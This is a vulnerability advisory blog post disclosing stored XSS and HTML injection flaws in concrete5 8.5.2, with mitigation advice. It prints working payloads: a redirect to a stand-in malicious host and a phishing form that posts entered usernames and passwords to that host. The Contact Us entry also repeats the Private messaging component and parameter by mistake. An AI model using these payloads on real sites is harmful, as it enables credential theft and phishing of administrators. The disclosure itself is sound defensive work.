This blog post will address recent Cross Site Scripting (XSS) Stored & HTML Injection Stored vulnerabilities discovered by Edgescan Senior Information Security Consultant, Guram Javakhishvili. These vulnerabilities were discovered while validating alerts as part of Edgescan’s human intelligence verification. These discoveries are shared with clients so they can evaluate and mitigate the risks. The vendor is also notified so they can resolve the issues and improve the overall security of the application.
Concrete5-8.5.2 is vulnerable to Cross Site Scripting (XSS) Stored & HTML Injection Stored
| Software: |
| concrete5 https://www.concrete5.org/ |
| Vulnerability: |
| Cross Site Scripting (XSS) Stored & HTML Injection Stored |
| Vulnerable component: |
| Contact Us Page & Private Messaging |
| Vulnerability disclosed at: |
| https://hackerone.com/reports/768327 & https://hackerone.com/reports/768313 |
| Vulnerable version: |
| 8.5.2 |
| Stable Fixed release: |
| 8.5.4 |
Concrete5 is an open source content management system (CMS) solution written in PHP. Complex websites made easy. A point and click, free CMS that creates websites. Concrete5 is used by major brands around the world, such as; GlobalSign, U.S.Army, REC, BASF, and many more, see full list here.
Concrete5 is designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page.
concrete5 version 8.5.2 suffer from persistent (Stored) cross site scripting and html injection vulnerabilities.
Insufficient validation of user input on both authenticated & unauthenticated parts of the concrete5 application exposes the application to persistent cross site scripting (XSS) & HTML Injection vulnerabilities.
These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.
1. Cross Site Scripting (XSS) Stored – Private messaging
Cross-site scripting is a flaw that allows users to inject HTML or JavaScript code into a page enabling arbitrary input. Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim views the page in this case administrative user.
It is possible for a lowest privileged user with access to private messaging to send private message to Administrator user with malicious Cross-site Scripting (XSS) payload.
| Detailed description and steps to reproduce this bug: |
| https://hackerone.com/reports/768313 |
| Resolution: |
| Fixed in 8.5.4 |
| Vulnerable component: |
| Private messaging |
| List of vulnerable parameters: |
| msgBody |
| Attacker Vector: |
| <input><img src=a onmouseover=window.location.href=’https://www.malicious.com’> |
| Impact: |
| An attacker could exploit these vulnerabilities to execute arbitrary script code in a user’s browser in the context of the affected site or execute arbitrary code on the server. Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim views the page in this case administrative user. |
2. Unauthenticated HTML Injection Stored – ContactUs form
concrete5 is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. An unauthenticated (public user) can inject arbitrary web script or HTML via Contact Us form in the body of the message. Message gets sent to an administrator and when the message is being viewed or clicked by an administrative user, he/she will be redirected to a malicious site.
| Detailed description and steps to reproduce this bug: |
| https://hackerone.com/reports/768327 |
| Resolution: |
| Fixed in 8.5.4 |
| Vulnerable component: |
| Private messaging |
| List of vulnerable parameters: |
| msgBody |
| Attacker Vector: |
| <html><body><head><meta content=”text/html; charset=utf-8″></meta></head> <div style=”text-align: center;”><form Method=”POST” Action=”http://www.malcious.com/”> Phishingpage :<br /><br/>Username :<br /> <input name=”User” /><br />Password :<br /> <input name=”Password” type=”password” /><br /><br /><input name=”Valid” value=”Ok !” type=”submit” /> <br /></form></div></body></html> <input><input”/onmouseover=”confirm(3333);//”onload=onload><input><innerHTML><img src=”https://www.malcious.com/sites/default/files/doggyFile.jpg” width=”1000″ height=”750″ alt=”onmouseover=prompt(1);//” /></a></input> |
| Impact: |
| An attacker could exploit these vulnerabilities to execute arbitrary script code in a user’s browser in the context of the affected site or execute arbitrary code on the server. HTML Injection vulnerability might lead us to Cross-Site Scripting, Server-Side Request Forgery(SSRF) attacks or open a Phishing page. |
Steps you should take to secure your CMS applications from hacking
XSS Attack Payload Types:
• Session hijacking
• Site defacement
• Network scanning
• Undermining CSRF defenses
• Site redirection/phishing
• Data theft
• Keystroke logging
• Loading of remotely hosted scripts
• These bugs have already been addressed by Concrete5 and the stable fixed release is out already, version: 8.5.4
• Several defensive techniques needed depending on context to prevent XSS attack, but in some cases, it can be much harder depending on the complexity of the application and the ways it handles user-controllable data. Example solutions:
i. Content security policy (CSP) is a browser mechanism that aims to mitigate the impact of cross-site scripting and some other vulnerabilities.
ii. Input Validate and Output Encode
iii. Use another layer of protection (WAF) Web Application Firewall, which automatically protects against all or most of the vulnerabilities. Install security plugins to actively prevent hacking attempts. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. These plugins notify the weaknesses inherent in each platform and halt the hacking attempts that could threaten your application. WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application.
• Crucially important to keep your installed scripts and CMS platforms up to date. Create a regular schedule to update or patch your CMS, and all installed plugins and themes. Ensure all components are up-to-date.
• At a minimum weekly update is equally important. Regularly backup the CMS and its underlying database.
• Subscribe to a regularly-updated list of vulnerabilities for the specific CMS being used.
• More training and resources available from Edgescan blog post, ‘Secure Application Development Training Material’ & ‘XSS Attack & Defense’
Subscribe to the Edgescan blog to receive updates.
Guram Javakhishvili
Senior Information Security Consultant
Edgescan